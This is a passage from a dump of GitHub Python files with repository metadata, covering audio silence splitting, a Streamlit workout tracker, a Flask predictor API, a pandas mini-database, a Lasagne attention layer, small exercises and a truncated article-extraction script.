audio_segment[i:i + min_silence_len]\n if audio_slice.rms <= silence_thresh:\n silence_starts.append(i)\n\n # short circuit when there is no silence\n if not silence_starts:\n return []\n\n # combine the silence we detected into ranges (start ms - end ms)\n silent_ranges = []\n\n prev_i = silence_starts.pop(0)\n current_range_start = prev_i\n\n for silence_start_i in silence_starts:\n continuous = (silence_start_i == prev_i + seek_step)\n\n # sometimes two small blips are enough for one particular slice to be\n # non-silent, despite the silence all running together. Just combine\n # the two overlapping silent ranges.\n silence_has_gap = silence_start_i > (prev_i + min_silence_len)\n\n if not continuous and silence_has_gap:\n silent_ranges.append([current_range_start,\n prev_i + min_silence_len])\n current_range_start = silence_start_i\n prev_i = silence_start_i\n\n silent_ranges.append([current_range_start,\n prev_i + min_silence_len])\n\n return silent_ranges\n\n\ndef detect_nonsilent(audio_segment, min_silence_len, silence_thresh, seek_step):\n silent_ranges = detect_silence(\n audio_segment, min_silence_len, silence_thresh, seek_step)\n len_seg = len(audio_segment)\n\n # if there is no silence, the whole thing is nonsilent\n if not silent_ranges:\n return [[0, len_seg]]\n\n # short circuit when the whole audio segment is silent\n if silent_ranges[0][0] == 0 and silent_ranges[0][1] == len_seg:\n return []\n\n print(\"silent_ranges in detect_nonsilent: \", silent_ranges)\n prev_end_i = 0\n nonsilent_ranges = []\n for start_i, end_i in silent_ranges:\n nonsilent_ranges.append([prev_end_i, start_i])\n prev_end_i = end_i\n\n if end_i != len_seg:\n nonsilent_ranges.append([prev_end_i, len_seg])\n\n if nonsilent_ranges[0] == [0, 0]:\n nonsilent_ranges.pop(0)\n\n print(\"nonsilent_ranges in detect_nonsilent method\", nonsilent_ranges)\n print(\"nonsilent_ranges in detect_nonsilent array size\", len(nonsilent_ranges))\n return nonsilent_ranges\n\n\ndef split_on_silence(audio_segment, min_silence_len, silence_thresh, keep_silence, seek_step):\n \"\"\"\n audio_segment - original pydub.AudioSegment() object\n min_silence_len - (in ms) minimum length of a silence to be used for\n a split. default: 1000ms\n silence_thresh - (in dBFS) anything quieter than this will be\n considered silence. default: -16dBFS\n keep_silence - (in ms) amount of silence to leave at the beginning\n and end of the chunks. 
Keeps the sound from sounding like it is\n abruptly cut off.\n \"\"\"\n\n not_silence_ranges = detect_nonsilent(\n audio_segment, min_silence_len, silence_thresh, seek_step)\n\n chunks = []\n for start_i, end_i in not_silence_ranges:\n start_i = max(0, start_i - keep_silence)\n end_i += keep_silence\n\n chunks.append(audio_segment[start_i:end_i])\n\n return chunks\n\n\nsound_file = AudioSegment.from_wav(\n r\"/home/kha/Documents/text-to-speech/Result-Audiobook/convertedrate.wav\")\naudio_chunks = split_on_silence(sound_file,\n # must be silent for at least half a second\n min_silence_len=50,\n\n # consider it silent if quieter than -16 dBFS\n silence_thresh=-23,\n keep_silence=100,\n seek_step=1\n )\n\nprint(\"Number of audio chunks produced from the given audio: \", len(audio_chunks))\n\nsilence_from_audio = detect_silence(\n sound_file, min_silence_len=50, silence_thresh=-23, seek_step=1)\ntotal_audio_time = 0\n\nheader_row = [\"\"]\nchunks_peak_amp_row = [\"Amplitude(Peak)\"]\nchunks_peak_amp_row_db = [\"Amplitude(dB)\"]\nchunks_peak_amp_row_dBFS = [\"Amplitude(dBFS)\"]\nchunks_time_duration = [\"Time duration\"]\nchunks_frame_count = [\"Frame Count\"]\n\nfor i, chunk in enumerate(audio_chunks):\n header_row.append(\"chunk\"+str(i+1))\n\nprint(\"header_row: \", header_row)\n\nwith open('Results.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(header_row)\n\n for i, chunk in enumerate(audio_chunks):\n out_file = \"/home/kha/Documents/text-to-speech/Result-Audiobook/Split-data/split{0}.wav\".format(\n i)\n print(\"exporting\", out_file)\n chunk.export(out_file, format=\"wav\")\n\n ##Peak Amplitude of each audio chunk\n chunks_peak_amp_row.append(chunk.max)\n chunks_peak_amp_row_db.append(control.mag2db(chunk.max))\n chunks_peak_amp_row_dBFS.append(chunk.max_dBFS)\n\n ##Time duration of each audio chunk\n chunks_time_duration.append(str(chunk.duration_seconds)+\" sec\")\n\n ##Frame count of each audio chunk\n chunks_frame_count.append(chunk.frame_count(ms=None))\n\n ##Total sum of audio lengths of all audio chunks\n total_audio_time = total_audio_time + chunk.duration_seconds\n\n writer.writerow(chunks_peak_amp_row)\n writer.writerow(chunks_peak_amp_row_db)\n writer.writerow(chunks_peak_amp_row_dBFS)\n writer.writerow(chunks_time_duration)\n writer.writerow(chunks_frame_count)\n writer.writerow([\"Total audio output time\", total_audio_time])\n csvFile.close()\n\nprint(total_audio_time, \"seconds\")\n","repo_name":"Van-Hoang-Kha/Designing-a-PDF-Audiobook-and-Audio-Processing-Remove-Silence-using-Python","sub_path":"Audio-Processing/Split-Audio/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":6643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"15424250795","text":"import altair as alt\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\nimport os\nimport re\nimport sqlite3\nimport datetime\nimport json\n\n\ndef main():\n st.set_page_config(layout=\"wide\")\n \n # Load silver SQLite database\n PATH = './data/silver/'\n con = sqlite3.connect(f\"{PATH}silver.sqlite\")\n\n workout_names = get_workout_names(con)\n col1, _, col2 = st.columns((1, 0.2, 1))\n\n with st.sidebar:\n st.write('# Select a workout')\n workout_name = st.radio('', workout_names)\n st.button(\"Add new\")\n\n last_workout_str, df_last_workout = get_last_workout(workout_name, con)\n last_workout_date = datetime.datetime.strptime(last_workout_str, \"%Y-%m-%d %H:%M:%S\")\n last_workout_date = 
last_workout_date.date()\n\n col1.write(\"# \" + workout_name.replace(\"_\", \" \"))\n col1.write(\"Latest workout\")\n \n col1.write(last_workout_date)\n weight_to_lift = col1.number_input(\"Weight\", min_value=0, value=int(df_last_workout[0][1]), key=workout_name[0] + 'weight')\n reps = col1.number_input('Reps', min_value=0, value=int(df_last_workout[0][2]), key=workout_name[0])\n col1.button(\"Add set\")\n col1.button(\"Reset to previous workout\")\n\n\n barbell_weight_allocation = col2.empty()\n barbell_weight_edit = col2.empty()\n weight_set_full = {20.0: 2, 10.0: 2, 5.0: 2, 2.5: 2, 1.0: 2, 0.75: 2, 0.5: 2, 0.25:2}\n\n with barbell_weight_edit.expander(\"Edit weight set\"):\n weight_bar = st.number_input(\"Weight of bar\", min_value=0, value=16)\n st.write(\"###### Plates\")\n for weight, number in weight_set_full.items():\n number = st.number_input(str(weight)+\" kg\", min_value=0, value=number)\n\n weight_set_to_use_full, weight_unallocated = calculate_barbell_weights(weight_to_lift, weight_set_full, weight_bar)\n df_barbell_weight_allocation = show_barbell_weight_allocation(weight_set_to_use_full)\n\n\n if weight_unallocated != 0:\n col2.write(f\"Unallocated {str(weight_unallocated)}\")\n\n\n\n chart = alt.Chart(df_barbell_weight_allocation).mark_bar().encode(\n x=alt.X('Plate:N', sort=df_barbell_weight_allocation['Plate'].to_list(), axis=alt.Axis(labelAngle=0), title='Barbell weight allocation'),\n y=alt.Y('Weight:Q', axis=None),\n tooltip=['Weight']\n ).configure_axis(\n grid=False\n ).configure_view(\n strokeWidth=0\n )\n\n\n barbell_weight_allocation.altair_chart(chart, use_container_width=True)\n\n\n con.close()\n\n\n #df_weights = weight_allocate_test(weight_set_full, weight_bar)\n #st.dataframe(df_weights.style.apply(highlight_unallocated, axis=1))\n\ndef calculate_barbell_weights(weight_to_lift, weight_set_full, weight_bar):\n \n weight_to_allocate = weight_to_lift - weight_bar\n if weight_to_allocate < 0:\n return {}, weight_to_allocate\n\n # Halve weight set because of two sides for barbell\n weight_set_half = {key: value//2 for key, value in weight_set_full.items()}\n weight_set_to_use_half, weight_unallocated = allocate_weights(weight_to_allocate/2, weight_set_half)\n\n # Double weight set for total weight\n return {key: value * 2 for key, value in weight_set_to_use_half.items()}, weight_unallocated * 2\n\ndef allocate_weights(weight_to_allocate, weight_set_full):\n\n weight_set = {}\n for weight, number in sorted(weight_set_full.items(), reverse=True):\n weight_set[weight] = 0\n\n if (weight_to_allocate >= weight) and number > 0:\n weight_set[weight] = min((weight_to_allocate // weight), number)\n weight_to_allocate -= min((weight_to_allocate // weight), number) * weight\n\n weight_unallocated = weight_to_allocate\n return weight_set, weight_unallocated\n\ndef total_weight(weight_set, weight_bar):\n total_weight = weight_bar\n for weight, number in weight_set.items():\n total_weight += weight * number\n return total_weight\n\ndef weight_allocate_test(weight_set_full, weight_bar):\n\n df_weights = pd.DataFrame()\n for i in range(15, 100):\n weight_set, weight_unallocated = calculate_barbell_weights(i, weight_set_full, weight_bar)\n weight_set['Barbell'] = weight_bar\n weight_set['Total weight'] = i\n weight_set['Unallocated'] = weight_unallocated\n\n df_weights = pd.concat([df_weights, weight_set], ignore_index=True)\n return df_weights\n\ndef highlight_unallocated(s):\n return ['background-color: red']*len(s) if s.Unallocated else ['background-color: 
white']*len(s)\n\ndef get_last_workout(workout_name, con):\n cur = con.cursor()\n\n # Get last date of particular workout\n query = \"SELECT Dates.WorkoutID, MAX(Date) \\\n FROM Workout_Set \\\n LEFT JOIN Dates \\\n ON Workout_Set.SetID = Dates.SetID \\\n WHERE Workout_Name=:workout_name\"\n\n cur.execute(query, {'workout_name': workout_name})\n temp = cur.fetchall()\n last_workoutID = temp[0][0]\n last_workout_date = temp[0][1]\n\n # Get details of latest workout\n query = \"SELECT Workout_Name, Weight, Reps \\\n FROM Workout_Set \\\n LEFT JOIN Dates \\\n ON Workout_Set.SetID = Dates.SetID \\\n WHERE WorkoutID=:workoutID \\\n AND Workout_Name=:workout_name\"\n\n cur.execute(query, {'workoutID': last_workoutID, 'workout_name': workout_name})\n\n return last_workout_date, cur.fetchall()\n\ndef get_workout_names(con):\n cursor = con.cursor()\n cursor.execute(\"SELECT DISTINCT(Workout_Name) FROM Workout_Set\")\n workout_names = cursor.fetchall()\n # Flatten nested list\n return [element for sublist in workout_names for element in sublist]\n\ndef show_barbell_weight_allocation(weight_set_to_use_full):\n\n df_barbell_weight_allocation = pd.DataFrame({\"Plate\":[],\n \"Weight\":[]})\n\n # One half of barbell\n for weight, number in weight_set_to_use_full.items():\n if number > 0:\n df_temp = pd.DataFrame({\"Plate\":[weight],\n \"Weight\":[weight]})\n df_barbell_weight_allocation = pd.concat([df_barbell_weight_allocation, df_temp], ignore_index=True)\n \n # Other half\n df_temp = df_barbell_weight_allocation.sort_values(by=[\"Plate\"])\n df_temp[\"Plate\"] = -df_temp[\"Plate\"]\n df_temp[\"Plate\"] = df_temp[\"Plate\"].astype(str)\n df_barbell_weight_allocation[\"Plate\"] = df_barbell_weight_allocation[\"Plate\"].astype(str)\n\n # Bar\n barbell = pd.DataFrame({\"Plate\":[\"bar\"],\n \"Weight\":[16]})\n\n df_temp = pd.concat([df_temp, barbell], ignore_index=True)\n df_barbell_weight_allocation = pd.concat([df_temp, df_barbell_weight_allocation], ignore_index=True)\n\n return df_barbell_weight_allocation\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alaistair/getting-stronger","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33039893439","text":"import numpy as np\nimport matplotlib.pylab as plt\n\n\nx0 = 10\nv0 = 0\ng = 9.81\ntmax = 10\ndt = 0.01\n\nn = int(tmax/dt)\ndth = dt/2\n\nt = np.zeros(n)\nx = np.zeros(n)\nv = np.zeros(n)\na = np.zeros(n)\n\nx[0] = x0\nv[0] = v0\na[0] = g\nt[0] = 0\n\n\nfor i in range(n-1):\n t[i + 1] = t[i] + dt\n a[i + 1] = x[0]/(2*t[i]**2)\n v[i + 1] = v[i] - a[i]*dt\n x[i + 1] = x[i] + v[i]*dt\n\n i += 1\n\n\n\nplt.plot(t,a, \"r\", label=\"acceleration\")\nplt.subplot(3,1,1)\nplt.plot(t,v, \"y\", label=\"velocity\")\nplt.subplot(3,1,2)\nplt.plot(t,x, \"b\", label=\"position\")\nplt.subplot(3,1,3)\n\nplt.legend()\nplt.show()\n","repo_name":"SimonkgB/SCHOOL","sub_path":"PROGRAMMERING/UNDERVISNING/SEMESTER1/FYS1100/OPPGAVER/integrere.py","file_name":"integrere.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11586263709","text":"from flask_restplus import Resource, abort\n\nfrom predictormanagerservice.api.v2.business import create_predictor, get_predictor, get_predictors, \\\nupdate_predictor_attributes, delete_predictor\nfrom predictormanagerservice.api.namespaces import predictors_namespace as api\nfrom 
predictormanagerservice.api.v2.serializers import create_fields, update_fields\nfrom predictormanagerservice.api.v2.parsers import error_response_body, error_response_body_500, PredictorParser\n\n\n@api.route('/predictors')\nclass PredictorCollection(Resource):\n @api.response(202, 'Accepted')\n @api.response(400, 'Bad Request', error_response_body)\n @api.response(403, 'Unauthorized')\n @api.response(415, 'Invalid Data Format')\n @api.response(500, 'Unexpected Error: The Predictor was not created', error_response_body_500)\n @api.expect(create_fields)\n def post(self):\n \"\"\"\n Deploy a model\n\n * Send a JSON object with values for the following items in the request body.\n\n ```\n {\n \"predictorName\": \"Predict1\",\n \"description\":\"This is a test.\",\n }\n ```\n \"\"\"\n return create_predictor()\n\n\n @api.response(200, 'Predictor successfully retrieved')\n @api.response(400, 'Bad Request', error_response_body)\n @api.response(404, 'Invalid Key')\n @api.response(500, 'Unexpected Error', error_response_body_500)\n\n def get(self):\n \"\"\"\n Returns all predictors in the system that the user is authorized to access.\n \"\"\"\n return get_predictors()\n\n\n@api.route('/predictors/<predictorKey>')\n@api.response(500, 'Unexpected Error')\nclass PredictorItem(Resource):\n @api.response(204, 'No Content')\n def delete(self, predictorKey):\n \"\"\"\n Delete Predictor with predictorKey\n \"\"\"\n return delete_predictor(predictorKey)\n\n @api.response(200, 'Predictor successfully retrieved')\n @api.response(400, 'Bad Request')\n @api.response(401, 'Not Authorized')\n @api.response(403, 'Forbidden')\n @api.response(404, 'Invalid Key')\n @api.response(500, 'Unexpected Error')\n def get(self, predictorKey):\n \"\"\"\n Retrieves Predictor with predictorKey\n \"\"\"\n return get_predictor(predictorKey)\n\n\n@api.route('/predictors/<predictorKey>/attributes')\n@api.response(500, 'Unexpected Error')\nclass PredictorAttributesResource(Resource):\n @api.response(200, 'OK')\n @api.response(400, 'Bad Request')\n @api.response(404, 'Not Found')\n def put(self, predictorKey):\n \"\"\"\n Update Predictor attributes for the model using the specified predictor key\n \"\"\"\n return update_predictor_attributes(predictorKey)\n","repo_name":"acumos/model-deployments-predictor-management","sub_path":"predictormanagerservice/api/v2/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"36418519984","text":"import numpy as np\nfrom . import database\nfrom . 
import preprocessor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\n\nnormalization = [\"MinMaxScaler_\", \"Standard_Scaler\", \"PolynomialFeaturesScaler\"]\n\n\ndef normalize(X, norm):\n \"\"\"\n chose a preproccessing method to apply to the data\n\n Parameters:\n\n X : np.ndarray\n The data to normalize\n\n norm : int\n The index of normalization list to know which preprocessing method to use.\n\n Returns:\n numpy.ndarray,\n a 2D array same shape as the input but normalized.\n\n \"\"\"\n\n degree = 2\n if norm == 2:\n normalization_to_call = getattr(preprocessor, normalization[2])\n normalized_set = normalization_to_call(X, scale=\"minmax\", degree=degree)\n elif norm == 3:\n normalization_to_call = getattr(preprocessor, normalization[2])\n normalized_set = normalization_to_call(X, scale=\"z-norm\", degree=degree)\n else:\n normalization_to_call = getattr(preprocessor, normalization[norm])\n normalized_set = normalization_to_call(X)\n return normalized_set\n\n\ndef regression(data, norm, model):\n \"\"\"\n apply the regression model to the data with a specific normalization method as preprocessing\n\n Parameters:\n\n data : int\n The index of data_base list to know which data to load.\n\n norm : int\n The index of normalization list to know which preprocessing method to use.\n\n model : string\n Which regression model to apply.\n\n Returns: \n list of np.array,\n A list of the values of the predicted attribute for every protocol.\n \n list of np.array,\n A list of the true values of the test set to compare with the prediction.\n\n \"\"\"\n\n y_predicted = []\n y_tested = []\n\n for i in range(len(database.seeds)):\n training_set = database.extract(data, i, 0)\n testing_set = database.extract(data, i, 1)\n normalized_train = normalize(training_set, norm)\n normalized_test = normalize(testing_set, norm)\n\n y_train = normalized_train[:, -1]\n y_test = normalized_test[:, -1]\n\n if model == \"LinearRegression\":\n regressor = LinearRegression()\n if model == \"Regressiontree\":\n regressor = DecisionTreeRegressor()\n\n regressor.fit(normalized_train, y_train)\n y_predict = regressor.predict(normalized_test)\n y_tested.append(y_test)\n y_predicted.append(y_predict)\n\n return y_tested, y_predicted\n # return for the 3 seeds","repo_name":"imenbenmhd/MiniProject","sub_path":"tgibm/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"724839865","text":"import copy\nimport os.path\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nimport json\n\nimport pandas\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n\n# to do look whats terality https://ibexorigin.medium.com/good-bye-pandas-meet-terality-its-evil-twin-with-identical-syntax-455b42f33a6d\n\n\n@dataclass\nclass DatabaseLog:\n log: DataFrame = field(init=False)\n\n def __post_init__(self):\n log_data = {\"action\": [\"init\"], \"info\": [\"init log entry\"], \"time\": [datetime.now()]}\n self.log = DataFrame(data=log_data)\n\n def add_log_entry(self, function_ref, info=\"\"):\n function_name = function_ref.__name__\n log_length = len(self.log)\n log_data = {\"action\": function_name, \"info\": info, \"time\": datetime.now()}\n self.log.loc[log_length] = log_data\n\n\n@dataclass\nclass Table:\n name: str\n df: DataFrame\n primary_keys: tuple\n is_unique: bool = False\n dtypes: dict = None\n primary_key: str 
= field(init=False)\n\n def __post_init__(self):\n self.primary_key = \"\"\n for i in range(0, len(self.primary_keys)):\n self.primary_key += str(self.primary_keys[i])\n if i < len(self.primary_keys)-1:\n self.primary_key += \":\"\n # if self.dtypes is None:\n # self.dtypes = list()\n # for t in df.dtypes:\n # self.dtypes.append(str(t))\n\n def check_uniqueness(self, data : dict):\n new_dict = dict()\n partial_table = None\n for key in self.primary_keys:\n if partial_table is None:\n #idx = np.where((self.df[key] == data[key]))\n idx = self.df[key] == data[key]\n partial_table = self.df.loc[idx]\n else:\n partial_table = partial_table.loc[partial_table[key] == data[key]]\n if partial_table is not None and len(partial_table) > 0:\n return False\n else:\n return True\n@dataclass\nclass Database:\n name: str\n persistent_path: str\n # values are pandas dataframes\n tables: dict = field(init=False)\n log: DatabaseLog = field(init=False)\n datetime_created: datetime = field(init=False)\n datetime_last_change: datetime = field(init=False)\n\n def action(self, name, paras):\n pass\n\n def add_table(self, name, columns, primary_keys: tuple, is_unique=False, dtypes=None):\n columns_dict = {}\n for column in columns:\n columns_dict[column] = []\n if dtypes is None:\n table_pd = DataFrame(data=columns_dict)\n self.tables[name] = Table(name, table_pd, primary_keys=primary_keys, is_unique=is_unique)\n else:\n dtypes_list = list()\n for k, v in dtypes.items():\n dtypes_list.append((k, v))\n dtypes_list = np.dtype(dtypes_list)\n empty_data = np.empty(0, dtype=dtypes_list)\n table_pd = DataFrame(empty_data)\n self.tables[name] = Table(name, table_pd, primary_keys=primary_keys, is_unique=is_unique, dtypes=dtypes)\n\n def add_row(self, table_name, data):\n\n table = self.tables[table_name]\n df = table.df\n df_length = len(df)\n index_of_new_row = df_length\n\n if isinstance(data, pd.DataFrame):\n self.tables[table_name] = self.tables[table_name].append(data)\n elif isinstance(data, list):\n # new_row = pd.Series(data=data, index=self.tables[table_name].columns)\n # self.tables[table_name] = self.tables[table_name].append(new_row, ignore_index=True)\n df.loc[df_length] = data\n elif isinstance(data, dict):\n #idx = np.where((df['Salary_in_1000'] >= 100) & (df['Age'] < 60) & (df['FT_Team'].str.startswith('S')))\n # new_row = pd.Series(data, index=self.tables[table_name].columns)\n # self.tables[table_name] = self.tables[table_name].append(new_row, ignore_index=True)\n df.loc[df_length] = data\n else:\n print(\"Not implemented, operation failed\")\n self.log.add_log_entry(self.add_row, \"table: \" + table_name + \", row_index: \" + str(index_of_new_row))\n\n def update_row(self, table_name : str, data: dict, index=None, condition=None):\n table = self.tables[table_name]\n df_table = table.df\n if index is not None:\n for key, value in data.items():\n df_table.at[index, key] = value\n self.log.add_log_entry(self.update_row, \"table: \" + table_name + \", row_index: \" + str(index))\n elif condition is not None:\n #https://stackoverflow.com/questions/36909977/update-row-values-where-certain-condition-is-met-in-pandas\n print(\"TO DO\")\n\n else:\n partial_table = None\n for key in table.primary_keys:\n if partial_table is None:\n # idx = np.where((self.df[key] == data[key]))\n idx = df_table[key] == data[key]\n partial_table = df_table.loc[idx]\n else:\n idx = partial_table[key] == data[key]\n partial_table = partial_table.loc[idx]\n print(partial_table)\n print(partial_table.index)\n 
df_table.loc[int(partial_table.index[0])] = list(data.values())\n\n\n def __post_init__(self):\n self.tables = {}\n self.datetime_created = datetime.now()\n self.datetime_last_change = self.datetime_created\n self.log = DatabaseLog()\n\n def save_as_csv(self, alt_path=None):\n table_info = dict()\n database_dir_path = self.persistent_path + \"/\" + self.name\n path_to_save = self.persistent_path if alt_path is None else alt_path\n table_dir = database_dir_path + \"/tables\"\n log_dir = database_dir_path + \"/log\"\n if not os.path.exists(path_to_save):\n os.mkdir(path_to_save)\n if not os.path.exists(database_dir_path):\n os.mkdir(database_dir_path)\n if not os.path.exists(table_dir):\n os.mkdir(table_dir)\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n for key in self.tables.keys():\n table = self.tables[key]\n\n path_of_table = table_dir + \"/\" + key + \".csv\"\n table.df.to_csv(path_of_table)\n\n info_dict = dict()\n dtypes_dict = dict()\n if table.dtypes is None:\n for k, v in table.df.dtypes.items():\n dtypes_dict[k] = str(v)\n else:\n for k, v in table.dtypes.items():\n dtypes_dict[k] = str(v)\n info_dict[\"dtypes\"] = dtypes_dict\n info_dict[\"primary_keys\"] = table.primary_keys\n info_dict[\"is_unique\"] = table.is_unique\n with open(table_dir + \"/\" + key + \".json\", 'w') as f:\n json.dump(info_dict, f)\n self.log.log.to_csv(log_dir + \"/log.csv\")\n\n @staticmethod\n def load_from_csv(path, database_name):\n from datetime import datetime\n db = Database(database_name, path)\n database_dir_path = db.persistent_path + \"/\" + db.name\n table_dir = database_dir_path + \"/tables\"\n log_dir = database_dir_path + \"/log\"\n tables = os.listdir(table_dir)\n for table in tables:\n if \".csv\" in table:\n table_name = table.split(\".csv\")[0]\n\n with open(table_dir + \"/\" + table_name + \".json\") as f:\n my_dict = json.load(f)\n dtypes = my_dict[\"dtypes\"]\n dtypes_2 = copy.deepcopy(dtypes)\n parse_dates = list()\n for k, v in dtypes.items():\n if \"datetime\" in v:\n parse_dates.append(k)\n del dtypes_2[k]\n\n table_pd = pandas.read_csv(table_dir + \"/\" + table, index_col=[0], dtype=dtypes_2, parse_dates=parse_dates)\n db.tables[table_name] = Table(table_name, table_pd, my_dict[\"primary_keys\"], is_unique=my_dict[\"is_unique\"], dtypes=dtypes)\n log = pandas.read_csv(log_dir + \"/log.csv\",index_col=[0], parse_dates=[\"time\"])\n\n db.log.log = log\n db.datetime_created = db.log.log.iloc[0]['time'].to_pydatetime()\n db.log.add_log_entry(Database.load_from_csv, \"loaded from \" + database_dir_path)\n return db\n","repo_name":"pixelbusiness/ms_data","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"9987319641","text":"import random\n\ndef dan():\n return random.choice([0, 1])\n\n\ndef ana():\n return random.choice([0, 0, 0, 1, 1, 1, 1, 1, 1, 1])\n\nana_won = 0\nfor i in range(10000):\n count_ana = 0\n count_dan = 0\n while(count_ana < 25):\n if ana() == 1:\n count_ana += 1\n else:\n count_dan += 1\n if dan() == 1:\n count_dan += 1\n else:\n count_ana += 1\n if count_ana == 25 and count_dan < 25:\n ana_won += 1\n\nprint(\"prob: \", ana_won/10000)","repo_name":"CristianProdius/Mathematics-Laboratories","sub_path":"lab1/PSA/Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"73142106287","text":"\"\"\"\nThe AttentionLayer implements attention mechanism, as in\nSoren Kaae Sonderby, Casper Kaae Sonderby, Henrik Nielsen, Ole Winther,\nConvolutional LSTM Networks for Subcellular Localization of Proteins, 2015,\nhttps://arxiv.org/abs/1503.01919\n\n\"\"\"\n\nimport numpy as np\nimport theano.tensor as T\nfrom lasagne import nonlinearities\nfrom lasagne import init\n\nfrom lasagne.layers import MergeLayer\n\n__all__ = [\n \"AttentionLayer\"\n]\n\n\nclass AttentionLayer(MergeLayer):\n def __init__(self, incoming, num_units, mask_input=None, W=init.GlorotUniform(),\n v=init.GlorotUniform(), b=init.Constant(0.), num_att_layers=1, nonlinearity=nonlinearities.tanh,\n **kwargs):\n\n incomings = [incoming]\n self.mask_incoming_index = -1\n if mask_input is not None:\n incomings.append(mask_input)\n self.mask_incoming_index = 1\n\n super(AttentionLayer, self).__init__(incomings, **kwargs)\n self.nonlinearity = (nonlinearities.identity if nonlinearity is None else nonlinearity)\n\n self.num_units = num_units\n self.num_att_layers = num_att_layers\n\n input_shape = self.input_shapes[0]\n num_inputs = int(np.prod(input_shape[2:]))\n\n self.W = [self.add_param(W, (num_inputs, num_units), name='W') for _ in range(self.num_att_layers)]\n self.v = self.add_param(v, (num_units, 1), name='v')\n self.b = [self.add_param(b, (num_units,), name='b', regularizable=False) for _ in range(self.num_att_layers)]\n\n def get_output_shape_for(self, input_shapes):\n input_shape = input_shapes[0]\n return input_shape[0], input_shape[2]\n\n def get_output_for(self, inputs, **kwargs):\n input = inputs[0]\n original_shape = input.shape\n\n mask = None\n if self.mask_incoming_index > 0:\n mask = inputs[self.mask_incoming_index]\n\n # reshape input\n input = input.reshape((input.shape[0] * input.shape[1], input.shape[2]))\n\n # apply mask\n if mask is not None:\n mask = mask.reshape((mask.shape[0] * mask.shape[1], 1))\n input *= mask\n\n # compute g(W* ... g(W* g(W*x+b) +b) ... 
+b) * v\n activation = input\n for W, b in zip(self.W, self.b):\n activation = T.dot(activation, W) + b.dimshuffle('x', 0)\n activation = self.nonlinearity(activation)\n activation = T.dot(activation, self.v)\n\n # apply softmax - acquiring attention weights for each letter in each tweet\n activation = activation.reshape((original_shape[0], original_shape[1]))\n attention_w = nonlinearities.softmax(activation)\n attention_w = attention_w.reshape((original_shape[0] * original_shape[1], 1))\n\n # get weighted sum of each hidden state according to attention weights\n context = input * attention_w\n context = context.reshape(original_shape)\n context = T.sum(context, axis=1)\n\n return context\n","repo_name":"zylamarek/twitter-sentiment","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"33273600297","text":"# print pattern\n# A B C D E\n# A B C D\n# A B C\n# A B\n# A\n\ndef pat(n):\n for i in range(n,0,-1):\n for j in range( i, n):\n print(\" \", end=\"\")\n for j in range(0,i):\n print(\" \",chr(j+65) , end=\" \")\n print(\"\")\n\nif __name__ == '__main__':\n n = int(input(\"Enter number : \"))\n pat(n)\n","repo_name":"nikhil03singh/Python-Patterns","sub_path":"51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17351918100","text":"# LeetCode \n# Summary Ranges https://leetcode.com/problems/summary-ranges/\n# \n\nclass Solution:\n # @param {integer[]} nums\n # @return {string[]}\n def summaryRanges(self, nums):\n result = []\n n = len(nums)\n start = 0\n end = 0\n\n if n == 0:\n return result\n\n for i in range(1, n):\n if (nums[i] - nums[i - 1] != 1):\n result.append(self._range(start, end, nums))\n start = i\n end = i\n else:\n end += 1\n\n result.append(self._range(start, end, nums))\n\n return result\n\n def _range(self, start, end, nums):\n if start == end:\n return \"{}\".format(nums[start])\n else:\n return \"{}->{}\".format(nums[start], nums[end])\n\n'''\ns = Solution()\nprint s.summaryRanges([0, 1, 2, 4, 5, 7])\nprint s.summaryRanges([0, 1, 2])\n'''\n\n","repo_name":"jeanpan/LeetCode","sub_path":"algorithms/summary_ranges.py","file_name":"summary_ranges.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34089302446","text":"import os\n\nimport psycopg2\n\nfrom src import util\nfrom src.data.articles import article as article_helper\nfrom src.data.articles.boilerpipe import BoilerPipeArticleExtractor\nfrom src.visualization.console import StatusVisualization\n\narticles_base_path = os.environ[\"DATA_PATH\"] + \"/raw/articles/\"\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(database=\"video_article_retrieval\", user=\"postgres\")\n c = conn.cursor()\n c.execute(\"SELECT source_url FROM articles WHERE text_extraction_status = 'Not Tried'\")\n extractor = BoilerPipeArticleExtractor()\n article_urls = list(c)\n crawling_progress = StatusVisualization(len(article_urls), update_every=100)\n\n for source_url, in article_urls:\n article_path, article_file = article_helper.get_article_html_filepath(source_url)\n html = util.load_gzip_text(os.path.join(article_path, article_file))\n try:\n text = extractor.get_text(html)\n # Save it to the DB\n c.execute(\"UPDATE articles SET text=%s, 
